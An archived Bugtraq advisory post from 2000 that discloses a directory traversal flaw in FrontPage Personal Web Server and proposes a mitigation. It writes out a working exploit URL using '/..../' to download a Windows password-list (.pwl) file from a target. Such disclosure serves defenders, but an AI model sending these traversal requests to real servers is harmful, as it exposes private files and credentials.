[13883] in bugtraq

home help back first fref pref prev next nref lref last post

Doubledot bug in FrontPage FrontPage Personal Web Server.

daemon@ATHENA.MIT.EDU (Jan van de Rijt)
Thu Feb 17 06:30:48 2000

Mime-Version: 1.0
Content-Type: multipart/alternative;
              boundary="----=_NextPart_000_0005_01BF7812.FB9D55C0"
Message-Id:  <000801bf780a$9ad4b2e0$0100007f@localhost>
Date:         Wed, 16 Feb 2000 00:15:51 +0100
Reply-To: Jan van de Rijt <rijt@wish.net>
From: Jan van de Rijt <rijt@WISH.NET>
X-To:         BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM

This is a multi-part message in MIME format.

------=_NextPart_000_0005_01BF7812.FB9D55C0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

Description: Doubledot bug in FrontPage FrontPage Personal Web Server.
Compromise: Accessing drive trough browser.
Vulnerable Systems: Frontpage-PWS32/3.0.2.926 other versions not tested.
Details:
When FrontPage-PWS runs a site on your c:\ drive your drive could be =
accessed by any user accessing your page, simply by requesting any file =
in any directory except the files in the FrontPage dir. specially =
/_vti_pvt/.

How to exploit this bug?
Simply adding /..../ in the URL addressbar.

http://www.target.com/..../<any_dir>/<any_file>

so by requesting http://www.target.com/..../Windows/Admin.pwl the =
webserver let us download the .pwl file from the target.

Files and dirs. with the hidden attribute set are vulnerable.

Solution:
The best solution is installing FrontPage on a drive that doesn't =
contain Private information.

Greetings,

Jan van de Rijt aka The Warlock.

------=_NextPart_000_0005_01BF7812.FB9D55C0
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META content=3D"text/html; charset=3Diso-8859-1" =
http-equiv=3DContent-Type>
<META content=3D"MSHTML 5.00.2314.1000" name=3DGENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=3D#ffffff>
<DIV><FONT face=3DArial size=3D2>Description: Doubledot bug in FrontPage =
FrontPage=20
Personal Web Server.<BR>Compromise: Accessing drive trough=20
browser.<BR>Vulnerable Systems: Frontpage-PWS32/3.0.2.926 other versions =
not=20
tested.<BR>Details:<BR>When FrontPage-PWS runs a site on your c:\ drive =
your=20
drive could be accessed by any user accessing your page, simply by =
requesting=20
any file in any directory except the files in the FrontPage dir. =
specially=20
/_vti_pvt/.</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>How to exploit this bug?<BR>Simply =
adding /..../ in=20
the URL addressbar.</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2><A=20
href=3D"http://www.target.com/..../<">http://www.target.com/..../&lt;</A>=
any_dir&gt;/&lt;any_file&gt;</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>so by requesting <A=20
href=3D"http://www.target.com/..../Windows/Admin.pwl">http://www.target.c=
om/..../Windows/Admin.pwl</A>&nbsp;the=20
webserver let us download the .pwl file from the target.</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>Files and dirs. with the hidden =
attribute set are=20
vulnerable.</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>Solution:<BR>The best solution is =
installing=20
FrontPage on a drive that doesn't contain Private =
information.</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>Greetings,</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>Jan van de Rijt aka The=20
Warlock.</FONT></DIV></BODY></HTML>

------=_NextPart_000_0005_01BF7812.FB9D55C0--

home help back first fref pref prev next nref lref last post